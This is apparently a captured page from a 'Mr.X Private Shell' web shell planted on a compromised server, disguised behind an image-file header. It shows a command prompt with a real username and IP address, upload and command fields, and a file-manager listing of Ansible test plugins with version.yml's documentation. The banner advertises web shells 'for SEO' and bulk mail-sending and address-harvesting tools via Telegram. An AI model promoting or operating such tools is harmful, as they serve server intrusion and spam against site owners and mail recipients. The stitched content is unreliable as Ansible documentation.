����JFIF��������� Mr.X
  
  __  __    __   __  _____      _            _          _____ _          _ _ 
 |  \/  |   \ \ / / |  __ \    (_)          | |        / ____| |        | | |
 | \  / |_ __\ V /  | |__) | __ ___   ____ _| |_ ___  | (___ | |__   ___| | |
 | |\/| | '__|> <   |  ___/ '__| \ \ / / _` | __/ _ \  \___ \| '_ \ / _ \ | |
 | |  | | |_ / . \  | |   | |  | |\ V / (_| | ||  __/  ____) | | | |  __/ | |
 |_|  |_|_(_)_/ \_\ |_|   |_|  |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1
 if you need WebShell for Seo everyday contact me on Telegram
 Telegram Address : @jackleet
        
        
For_More_Tools: Telegram: @jackleet | Bulk Smtp support mail sender | Business Mail Collector | Mail Bouncer All Mail | Bulk Office Mail Validator | Html Letter private



Upload:

Command:

deexcl@216.73.217.71: ~ $
DOCUMENTATION:
  name: version
  author: Ansible Core
  version_added: "1.6"
  short_description: compare version strings
  aliases: [version_compare]
  description:
    - Compare version strings using various versioning schemes
  options:
    _input:
      description: Left hand version to compare
      type: string
      required: True
    version:
      description: Right hand version to compare
      type: string
      required: True
    operator:
      description: Comparison operator
      type: string
      required: False
      choices:
        - ==
        - '='
        - eq
        - <
        - lt
        - <=
        - le
        - '>'
        - gt
        - '>='
        - ge
        - '!='
        - <>
        - ne
      default: eq
    strict:
      description: Whether to use strict version scheme. Mutually exclusive with C(version_type)
      type: boolean
      required: False
      default: False
    version_type:
      description: Version scheme to use for comparison. Mutually exclusive with C(strict). See C(notes) for descriptions on the version types.
      type: string
      required: False
      choices:
        - loose
        - strict
        - semver
        - semantic
        - pep440
      default: loose
  notes:
    - C(loose) - This type corresponds to the Python C(distutils.version.LooseVersion) class. All version formats are valid for this type. The rules for comparison are simple and predictable, but may not always give expected results.
    - C(strict) - This type corresponds to the Python C(distutils.version.StrictVersion) class. A version number consists of two or three dot-separated numeric components, with an optional "pre-release" tag on the end. The pre-release tag consists of a single letter C(a) or C(b) followed by a number.  If the numeric components of two version numbers are equal, then one with a pre-release tag will always be deemed earlier (lesser) than one without.
    - C(semver)/C(semantic) - This type implements the L(Semantic Version,https://semver.org) scheme for version comparison.
    - C(pep440) - This type implements the Python L(PEP-440,https://peps.python.org/pep-0440/) versioning rules for version comparison. Added in version 2.14.
EXAMPLES: |
  - name: version test examples
    assert:
      that:
        - "'1.0' is version_compare('1.0', '==')"  # old name
        - "'1.0' is version('1.0', '==')"
        - "'1.0' is version('2.0', '!=')"
        - "'1.0' is version('2.0', '<')"
        - "'2.0' is version('1.0', '>')"
        - "'1.0' is version('1.0', '<=')"
        - "'1.0' is version('1.0', '>=')"
        - "'1.0' is version_compare('1.0', '==', strict=true)"  # old name
        - "'1.0' is version('1.0', '==', strict=true)"
        - "'1.0' is version('2.0', '!=', strict=true)"
        - "'1.0' is version('2.0', '<', strict=true)"
        - "'2.0' is version('1.0', '>', strict=true)"
        - "'1.0' is version('1.0', '<=', strict=true)"
        - "'1.0' is version('1.0', '>=', strict=true)"
        - "'1.2.3' is version('2.0.0', 'lt', version_type='semver')"
        - "'2.14.0rc1' is version('2.14.0', 'lt', version_type='pep440')"
RETURN:
  _value:
    description: Returns C(True) or C(False) depending on the outcome of the comparison.
    type: boolean

Filemanager

Name Type Size Permission Actions
__pycache__ Folder 0755
__init__.py File 471 B 0644
abs.yml File 764 B 0644
all.yml File 701 B 0644
any.yml File 698 B 0644
change.yml File 664 B 0644
changed.yml File 664 B 0644
contains.yml File 1.26 KB 0644
core.py File 9.07 KB 0644
directory.yml File 660 B 0644
exists.yml File 836 B 0644
failed.yml File 803 B 0644
failure.yml File 803 B 0644
falsy.yml File 801 B 0644
file.yml File 651 B 0644
files.py File 1.48 KB 0644
finished.yml File 699 B 0644
is_abs.yml File 764 B 0644
is_dir.yml File 660 B 0644
is_file.yml File 651 B 0644
is_link.yml File 648 B 0644
is_mount.yml File 596 B 0644
is_same_file.yml File 737 B 0644
isnan.yml File 584 B 0644
issubset.yml File 750 B 0644
issuperset.yml File 754 B 0644
link.yml File 648 B 0644
link_exists.yml File 706 B 0644
match.yml File 1007 B 0644
mathstuff.py File 1.52 KB 0644
mount.yml File 596 B 0644
nan.yml File 584 B 0644
reachable.yml File 693 B 0644
regex.yml File 1.01 KB 0644
same_file.yml File 737 B 0644
search.yml File 923 B 0644
skip.yml File 623 B 0644
skipped.yml File 623 B 0644
started.yml File 690 B 0644
subset.yml File 750 B 0644
succeeded.yml File 692 B 0644
success.yml File 692 B 0644
successful.yml File 692 B 0644
superset.yml File 754 B 0644
truthy.yml File 789 B 0644
unreachable.yml File 696 B 0644
uri.py File 1.1 KB 0644
uri.yml File 1.09 KB 0644
url.yml File 934 B 0644
urn.yml File 576 B 0644
vault_encrypted.yml File 563 B 0644
version.yml File 3.21 KB 0644
version_compare.yml File 3.21 KB 0644